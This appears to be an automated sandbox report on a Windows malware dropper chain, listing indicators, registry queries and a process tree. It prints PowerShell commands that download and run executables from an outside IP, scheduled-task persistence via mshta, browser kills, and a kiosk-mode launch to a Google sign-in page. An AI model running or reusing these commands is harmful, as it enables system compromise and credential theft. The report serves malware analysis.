\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 78b2543906.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 0d13ae9780.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5c66c0d7c6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ftS1RPn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe -
Checks processor information in registry 2 TTPs 13 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 0d9d6a5bdb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 0d9d6a5bdb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 668 timeout.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 380 taskkill.exe 2492 taskkill.exe 4668 taskkill.exe 4832 taskkill.exe 4968 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133846842338751410" chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 620 schtasks.exe 1980 schtasks.exe 1980 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 5324 7tzlyz8.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4972 88345910e7756216c80bf4046952980b.exe 4972 88345910e7756216c80bf4046952980b.exe 1464 skotes.exe 1464 skotes.exe 2472 powershell.exe 2472 powershell.exe 3284 powershell.exe 3284 powershell.exe 2368 powershell.exe 2716 TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE 2716 TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE 2368 powershell.exe 4680 60cad02928.exe 4680 60cad02928.exe 5076 powershell.exe 4680 60cad02928.exe 4680 60cad02928.exe 4680 60cad02928.exe 4680 60cad02928.exe 5076 powershell.exe 2716 TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE 2716 TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE 3016 0bb5042f9a.exe 3016 0bb5042f9a.exe 1116 powershell.exe 1116 powershell.exe 2124 483d2fa8a0d53818306efeb32d3.exe 2124 483d2fa8a0d53818306efeb32d3.exe 1912 0d13ae9780.exe 1912 0d13ae9780.exe 1648 powershell.exe 1648 powershell.exe 5404 TempPHAHBIS4BFQXTSNMRSVJUL5Y7RXHUVCH.EXE 5404 TempPHAHBIS4BFQXTSNMRSVJUL5Y7RXHUVCH.EXE 1912 0d13ae9780.exe 1912 0d13ae9780.exe 3124 5c66c0d7c6.exe 3124 5c66c0d7c6.exe 3124 5c66c0d7c6.exe 3124 5c66c0d7c6.exe 3124 5c66c0d7c6.exe 3124 5c66c0d7c6.exe 5520 d6a6205f6a.exe 5520 d6a6205f6a.exe 5520 d6a6205f6a.exe 5520 d6a6205f6a.exe 5520 d6a6205f6a.exe 5520 d6a6205f6a.exe 5664 skotes.exe 5664 skotes.exe 5920 da79c1018d.exe 5920 da79c1018d.exe 5920 da79c1018d.exe 5920 da79c1018d.exe 5920 da79c1018d.exe 5920 da79c1018d.exe 1116 49e58b4688.exe 1116 49e58b4688.exe 1116 49e58b4688.exe 1116 49e58b4688.exe 6084 ftS1RPn.exe 6084 ftS1RPn.exe 2996 ebp51gY.exe 2996 ebp51gY.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 5180 chrome.exe 5180 chrome.exe 5180 chrome.exe 6168 msedge.exe 6168 msedge.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeDebugPrivilege 2472 powershell.exe Token: SeDebugPrivilege 3284 powershell.exe Token: SeDebugPrivilege 2368 powershell.exe Token: SeDebugPrivilege 5076 powershell.exe Token: SeDebugPrivilege 2716 TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE Token: SeDebugPrivilege 1116 powershell.exe Token: SeDebugPrivilege 380 taskkill.exe Token: SeDebugPrivilege 2492 taskkill.exe Token: SeDebugPrivilege 1648 powershell.exe Token: SeDebugPrivilege 4668 taskkill.exe Token: SeDebugPrivilege 4832 taskkill.exe Token: SeDebugPrivilege 4968 taskkill.exe Token: SeDebugPrivilege 3704 firefox.exe Token: SeDebugPrivilege 3704 firefox.exe Token: SeDebugPrivilege 5272 a4809023d2.exe Token: SeDebugPrivilege 632 0d7b7da04a.exe Token: SeDebugPrivilege 5324 7tzlyz8.exe Token: SeDebugPrivilege 5324 7tzlyz8.exe Token: SeShutdownPrivilege 5180 chrome.exe Token: SeCreatePagefilePrivilege 5180 chrome.exe Token: SeShutdownPrivilege 5180 chrome.exe Token: SeCreatePagefilePrivilege 5180 chrome.exe Token: SeShutdownPrivilege 5180 chrome.exe Token: SeCreatePagefilePrivilege 5180 chrome.exe Token: SeShutdownPrivilege 5180 chrome.exe Token: SeCreatePagefilePrivilege 5180 chrome.exe Token: SeShutdownPrivilege 5180 chrome.exe Token: SeCreatePagefilePrivilege 5180 chrome.exe Token: SeDebugPrivilege 2308 AddInProcess32.exe Token: SeShutdownPrivilege 5180 chrome.exe Token: SeCreatePagefilePrivilege 5180 chrome.exe Token: SeShutdownPrivilege 5180 chrome.exe Token: SeCreatePagefilePrivilege 5180 chrome.exe Token: SeDebugPrivilege 5508 AddInProcess32.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4972 88345910e7756216c80bf4046952980b.exe 1324 78b2543906.exe 1324 78b2543906.exe 1324 78b2543906.exe 1912 0d13ae9780.exe 1912 0d13ae9780.exe 1912 0d13ae9780.exe 1912 0d13ae9780.exe 1912 0d13ae9780.exe 4176 91a34343bc.exe 4176 91a34343bc.exe 4176 91a34343bc.exe 1912 0d13ae9780.exe 1912 0d13ae9780.exe 1912 0d13ae9780.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 1912 0d13ae9780.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 1912 0d13ae9780.exe 1912 0d13ae9780.exe 1912 0d13ae9780.exe 5180 chrome.exe 5180 chrome.exe 5180 chrome.exe 5180 chrome.exe 5180 chrome.exe 5180 chrome.exe 5180 chrome.exe 5180 chrome.exe 5180 chrome.exe 5180 chrome.exe 5180 chrome.exe 5180 chrome.exe 5180 chrome.exe 5180 chrome.exe 5180 chrome.exe 5180 chrome.exe 5180 chrome.exe 5180 chrome.exe 5180 chrome.exe 5180 chrome.exe 5180 chrome.exe 5180 chrome.exe 5180 chrome.exe 5180 chrome.exe -
Suspicious use of SendNotifyMessage 38 IoCs
pid Process 1324 78b2543906.exe 1324 78b2543906.exe 1324 78b2543906.exe 1912 0d13ae9780.exe 1912 0d13ae9780.exe 1912 0d13ae9780.exe 1912 0d13ae9780.exe 1912 0d13ae9780.exe 4176 91a34343bc.exe 4176 91a34343bc.exe 4176 91a34343bc.exe 1912 0d13ae9780.exe 1912 0d13ae9780.exe 1912 0d13ae9780.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 1912 0d13ae9780.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 3704 firefox.exe 1912 0d13ae9780.exe 1912 0d13ae9780.exe 1912 0d13ae9780.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3704 firefox.exe 5324 7tzlyz8.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4972 wrote to memory of 1464 4972 88345910e7756216c80bf4046952980b.exe 88 PID 4972 wrote to memory of 1464 4972 88345910e7756216c80bf4046952980b.exe 88 PID 4972 wrote to memory of 1464 4972 88345910e7756216c80bf4046952980b.exe 88 PID 1464 wrote to memory of 1324 1464 skotes.exe 89 PID 1464 wrote to memory of 1324 1464 skotes.exe 89 PID 1464 wrote to memory of 1324 1464 skotes.exe 89 PID 1324 wrote to memory of 1016 1324 78b2543906.exe 90 PID 1324 wrote to memory of 1016 1324 78b2543906.exe 90 PID 1324 wrote to memory of 1016 1324 78b2543906.exe 90 PID 1324 wrote to memory of 1616 1324 78b2543906.exe 91 PID 1324 wrote to memory of 1616 1324 78b2543906.exe 91 PID 1324 wrote to memory of 1616 1324 78b2543906.exe 91 PID 1016 wrote to memory of 620 1016 cmd.exe 93 PID 1016 wrote to memory of 620 1016 cmd.exe 93 PID 1016 wrote to memory of 620 1016 cmd.exe 93 PID 1616 wrote to memory of 2472 1616 mshta.exe 94 PID 1616 wrote to memory of 2472 1616 mshta.exe 94 PID 1616 wrote to memory of 2472 1616 mshta.exe 94 PID 1464 wrote to memory of 1140 1464 skotes.exe 96 PID 1464 wrote to memory of 1140 1464 skotes.exe 96 PID 1464 wrote to memory of 1140 1464 skotes.exe 96 PID 1140 wrote to memory of 3452 1140 cmd.exe 98 PID 1140 wrote to memory of 3452 1140 cmd.exe 98 PID 1140 wrote to memory of 3452 1140 cmd.exe 98 PID 3452 wrote to memory of 668 3452 cmd.exe 100 PID 3452 wrote to memory of 668 3452 cmd.exe 100 PID 3452 wrote to memory of 668 3452 cmd.exe 100 PID 3452 wrote to memory of 768 3452 cmd.exe 101 PID 3452 wrote to memory of 768 3452 cmd.exe 101 PID 3452 wrote to memory of 768 3452 cmd.exe 101 PID 768 wrote to memory of 3284 768 cmd.exe 102 PID 768 wrote to memory of 3284 768 cmd.exe 102 PID 768 wrote to memory of 3284 768 cmd.exe 102 PID 2472 wrote to memory of 2716 2472 powershell.exe 103 PID 2472 wrote to memory of 2716 2472 powershell.exe 103 PID 2472 wrote to memory of 2716 2472 powershell.exe 103 PID 3452 wrote to memory of 4676 3452 cmd.exe 104 PID 3452 wrote to memory of 4676 3452 cmd.exe 104 PID 3452 wrote to memory of 4676 3452 cmd.exe 104 PID 4676 wrote to memory of 2368 4676 cmd.exe 105 PID 4676 wrote to memory of 2368 4676 cmd.exe 105 PID 4676 wrote to memory of 2368 4676 cmd.exe 105 PID 1464 wrote to memory of 4680 1464 skotes.exe 106 PID 1464 wrote to memory of 4680 1464 skotes.exe 106 PID 1464 wrote to memory of 4680 1464 skotes.exe 106 PID 3452 wrote to memory of 4440 3452 cmd.exe 107 PID 3452 wrote to memory of 4440 3452 cmd.exe 107 PID 3452 wrote to memory of 4440 3452 cmd.exe 107 PID 4440 wrote to memory of 5076 4440 cmd.exe 108 PID 4440 wrote to memory of 5076 4440 cmd.exe 108 PID 4440 wrote to memory of 5076 4440 cmd.exe 108 PID 3452 wrote to memory of 1980 3452 cmd.exe 110 PID 3452 wrote to memory of 1980 3452 cmd.exe 110 PID 3452 wrote to memory of 1980 3452 cmd.exe 110 PID 3452 wrote to memory of 4812 3452 cmd.exe 111 PID 3452 wrote to memory of 4812 3452 cmd.exe 111 PID 3452 wrote to memory of 4812 3452 cmd.exe 111 PID 1464 wrote to memory of 3016 1464 skotes.exe 112 PID 1464 wrote to memory of 3016 1464 skotes.exe 112 PID 1464 wrote to memory of 3016 1464 skotes.exe 112 PID 4812 wrote to memory of 1116 4812 mshta.exe 113 PID 4812 wrote to memory of 1116 4812 mshta.exe 113 PID 4812 wrote to memory of 1116 4812 mshta.exe 113 PID 1464 wrote to memory of 1912 1464 skotes.exe 115 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\88345910e7756216c80bf4046952980b.exe"C:\Users\Admin\AppData\Local\Temp\88345910e7756216c80bf4046952980b.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Users\Admin\AppData\Local\Temp\1091274101\78b2543906.exe"C:\Users\Admin\AppData\Local\Temp\1091274101\78b2543906.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn szJTqmail7h /tr "mshta C:\Users\Admin\AppData\Local\Temp\PT6IsU2Pt.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn szJTqmail7h /tr "mshta C:\Users\Admin\AppData\Local\Temp\PT6IsU2Pt.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:620
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\PT6IsU2Pt.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Users\Admin\AppData\Local\TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE"C:\Users\Admin\AppData\Local\TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1091275021\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091275021\am_no.cmd" any_word4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3452 -
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:668
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3284
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2368
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5076
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "kPrXUma0d5h" /tr "mshta \"C:\Temp\pQy5eYFwx.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1980
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\pQy5eYFwx.hta"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1116 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2124
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091314001\60cad02928.exe"C:\Users\Admin\AppData\Local\Temp\1091314001\60cad02928.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4680
-
-
C:\Users\Admin\AppData\Local\Temp\1091315001\0bb5042f9a.exe"C:\Users\Admin\AppData\Local\Temp\1091315001\0bb5042f9a.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3016
-
-
C:\Users\Admin\AppData\Local\Temp\1091316001\0d13ae9780.exe"C:\Users\Admin\AppData\Local\Temp\1091316001\0d13ae9780.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1912 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:380
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2492
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4668
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4832
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4968
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:5100
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3704 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2000 -parentBuildID 20240401114208 -prefsHandle 1916 -prefMapHandle 1908 -prefsLen 27352 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9b9c3599-f0a8-4e33-9dd4-0ae86a895421} 3704 "\\.\pipe\gecko-crash-server-pipe.3704" gpu6⤵PID:4076
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2420 -parentBuildID 20240401114208 -prefsHandle 2412 -prefMapHandle 2400 -prefsLen 28272 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {231f7e8e-2982-4e3d-ad70-c829351a1992} 3704 "\\.\pipe\gecko-crash-server-pipe.3704" socket6⤵PID:4904
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3460 -childID 1 -isForBrowser -prefsHandle 3220 -prefMapHandle 3340 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {906aadc9-4bd1-4e69-a407-9ff3addfc948} 3704 "\\.\pipe\gecko-crash-server-pipe.3704" tab6⤵PID:4488
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4040 -childID 2 -isForBrowser -prefsHandle 3992 -prefMapHandle 3988 -prefsLen 32762 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c9d612de-c227-4262-b289-4717afb616ec} 3704 "\\.\pipe\gecko-crash-server-pipe.3704" tab6⤵PID:1264
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4752 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4776 -prefMapHandle 4772 -prefsLen 32762 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dd3f1cc9-be11-43bb-a019-9478feeaafd6} 3704 "\\.\pipe\gecko-crash-server-pipe.3704" utility6⤵
- Checks processor information in registry
PID:5236
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5216 -childID 3 -isForBrowser -prefsHandle 5164 -prefMapHandle 5208 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f98a7406-1cd2-4e72-aebb-52bad53dab01} 3704 "\\.\pipe\gecko-crash-server-pipe.3704" tab6⤵PID:5748
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5368 -childID 4 -isForBrowser -prefsHandle 4188 -prefMapHandle 5232 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b85271b-0cd2-4534-97e0-ef14101495cd} 3704 "\\.\pipe\gecko-crash-server-pipe.3704" tab6⤵PID:5772
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5580 -childID 5 -isForBrowser -prefsHandle 5652 -prefMapHandle 5644 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f6138cd1-013b-4350-8fd8-a09932a9ee1f} 3704 "\\.\pipe\gecko-crash-server-pipe.3704" tab6⤵PID:5788
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091317001\91a34343bc.exe"C:\Users\Admin\AppData\Local\Temp\1091317001\91a34343bc.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4176 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn pzT8Hman5CG /tr "mshta C:\Users\Admin\AppData\Local\Temp\2qCELHNfo.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
